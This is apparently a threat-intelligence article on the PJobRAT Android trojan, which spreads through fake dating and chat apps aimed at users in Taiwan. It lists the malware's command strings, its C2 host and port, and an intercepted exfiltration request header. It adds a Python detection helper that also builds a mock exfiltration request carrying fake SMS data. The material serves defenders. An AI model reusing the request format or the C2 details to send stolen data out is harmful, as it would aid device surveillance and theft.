PJobRAT, an Android Remote Access Trojan (RAT) first documented in 2019, has resurfaced with expanded capabilities and a narrower targeting strategy. Previously observed in 2021 attacks on Indian military personnel, the malware has since shifted its focus to users in Taiwan, who are reached through social engineering rather than any exploit.
By posing as dating and instant-messaging applications, PJobRAT lures victims into downloading malicious apps from compromised websites. The operators have shown persistence and adaptability: the latest campaign reportedly ran for roughly 22 months, from early 2023 to October 2024.
Distribution relied primarily on WordPress sites hosting fake messaging applications such as “SaangalLite,” which mimics the legitimate SignalLite, and “CChat,” which impersonates an app that was once legitimate.
The small infection footprint indicates highly targeted attacks rather than a broad campaign. Researchers at Sophos identified significant technical changes in the latest PJobRAT variants. The malware keeps its core data-theft functionality, exfiltrating SMS messages, contacts, device details and media files, but it can now also run shell commands on the device, which substantially widens the operator's control over compromised handsets.
Infection
Upon installation, the malicious applications provide basic chat functionality, giving the app a veneer of legitimacy while it establishes persistence on the device. The apps request extensive permissions, including an exemption from battery optimization, so that they can keep running in the background without being killed by the OS.
The malware communicates over two channels, which makes the operation more resilient if one is blocked. Firebase Cloud Messaging (FCM) serves as the command channel: the operator pushes predefined command strings such as “aceamace” (upload SMS), “chall” (run shell command) and “kontak” (upload contacts). Because FCM messages arrive through Google's push infrastructure, command traffic looks like ordinary app push notifications rather than connections to an attacker-controlled host, and it will not show up in proxy logs as requests to the C2 server.
A second, HTTP-based channel carries exfiltrated data to the command-and-control server at westvist[.]myftp[.]org (port 3574). Stolen data is sent as multipart form POST requests, as in this intercepted request:
POST /mchowasrv/main.php HTTP/1.1
Content-Type: multipart/form-data; boundary=a3c1b36e-3ce6-4117-8ed1-7af403ad1023
Content-Length: 1336
Host: westvist.myftp.org:3574
Connection: Keep-Alive
User-Agent: okhttp/4.10.0
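The request above gives a network defender three indicators (the host, the path and the okhttp User-Agent) and a format to unpack. The following helper, added here as an example and not Sophos' code or the malware's own, scores a raw HTTP request against those indicators and parses its multipart body so that the uploaded fields can be inspected. The host and path are weighted higher than the User-Agent, because okhttp/4.10.0 is a very common Android HTTP client and on its own proves nothing. The sample request it builds is constructed for illustration: the field names (“device”, “sms”) and their contents are assumptions about how such an upload could be laid out, not a captured payload.

```python
"""Detection helper for PJobRAT-style multipart exfiltration over HTTP.

Added example, not Sophos' code and not the malware's own. The host, path and
User-Agent are the ones in the intercepted request above; the body fields and
the sample request are constructed for illustration and are an assumption
about how a multipart upload could be laid out, not a captured payload.
"""
import uuid
from email.parser import BytesParser

# Indicators visible in the intercepted request, with a weight each. Host and
# path are specific to this C2; okhttp is a very common Android HTTP client,
# so the User-Agent alone is weak evidence.
INDICATORS = {
    "host": ("westvist.myftp.org", 3),
    "path": ("/mchowasrv/main.php", 3),
    "user_agent": ("okhttp/4.10.0", 1),
}
ALERT_THRESHOLD = 3  # one strong indicator is enough to raise an alert


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, headers, body).

    Header names are lower-cased so lookups are case-insensitive.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.split(b"\r\n")
    method, path, _version = request_line.decode("ascii", "replace").split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_multipart(content_type: str, body: bytes) -> dict:
    """Return {field_name: payload_bytes} for a multipart/form-data body.

    The stdlib email parser handles RFC 2046 multipart bodies once it is given
    the Content-Type header, which carries the boundary string.
    """
    msg = BytesParser().parsebytes(
        b"Content-Type: " + content_type.encode("latin-1") + b"\r\n\r\n" + body
    )
    if not msg.is_multipart():
        return {}
    fields = {}
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        fields[name] = part.get_payload(decode=True)
    return fields


def classify_request(raw: bytes) -> dict:
    """Score a raw request against the C2 indicators and unpack its upload."""
    method, path, headers, body = parse_http_request(raw)
    host = headers.get("host", "").split(":")[0]  # drop the port (3574 above)
    observed = {"host": host, "path": path, "user_agent": headers.get("user-agent", "")}
    matched = [k for k, (value, _w) in INDICATORS.items() if observed[k] == value]
    score = sum(INDICATORS[k][1] for k in matched)
    fields = {}
    ctype = headers.get("content-type", "")
    if method == "POST" and ctype.startswith("multipart/form-data"):
        fields = parse_multipart(ctype, body)
    return {"alert": score >= ALERT_THRESHOLD, "score": score,
            "matched": matched, "fields": fields}


def build_sample_request(boundary: str, fields: dict) -> bytes:
    """Assemble a request shaped like the intercepted one (constructed sample)."""
    body = b""
    for name, value in fields.items():
        body += f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n'.encode()
        body += value + b"\r\n"
    body += f"--{boundary}--\r\n".encode()
    head = (
        "POST /mchowasrv/main.php HTTP/1.1\r\n"
        f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Host: westvist.myftp.org:3574\r\n"
        "Connection: Keep-Alive\r\n"
        "User-Agent: okhttp/4.10.0\r\n\r\n"
    )
    return head.encode() + body


# Constructed sample: field names and contents are assumptions, not from the capture.
# The captured boundary is UUID-shaped, so the sample uses a random UUID too.
SAMPLE_FIELDS = {
    "device": b"Pixel 6a / Android 13",
    "sms": b"+886900000000|2024-10-01 09:12|one-time code 481516",
}
SAMPLE_REQUEST = build_sample_request(str(uuid.uuid4()), SAMPLE_FIELDS)

# A benign okhttp request to an unrelated host: same User-Agent, no alert.
BENIGN_REQUEST = (
    b"GET /api/v1/feed HTTP/1.1\r\nHost: example.com\r\n"
    b"User-Agent: okhttp/4.10.0\r\n\r\n"
)

if __name__ == "__main__":
    print(classify_request(SAMPLE_REQUEST))
    print(classify_request(BENIGN_REQUEST))
```

Feeding the constructed sample to classify_request yields all three indicators and the two unpacked fields; the benign okhttp request matches only the User-Agent and stays below the threshold. In practice the same scoring can be run over proxy or TLS-inspection logs, but note that a dynamic DNS hostname like this one can be repointed at will, so the host indicator decays faster than the path.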
While this specific campaign appears to have ended, the continued evolution of PJobRAT shows that mobile malware aimed at high-value individuals remains a persistent threat, and that an app's working chat features are no evidence of its legitimacy.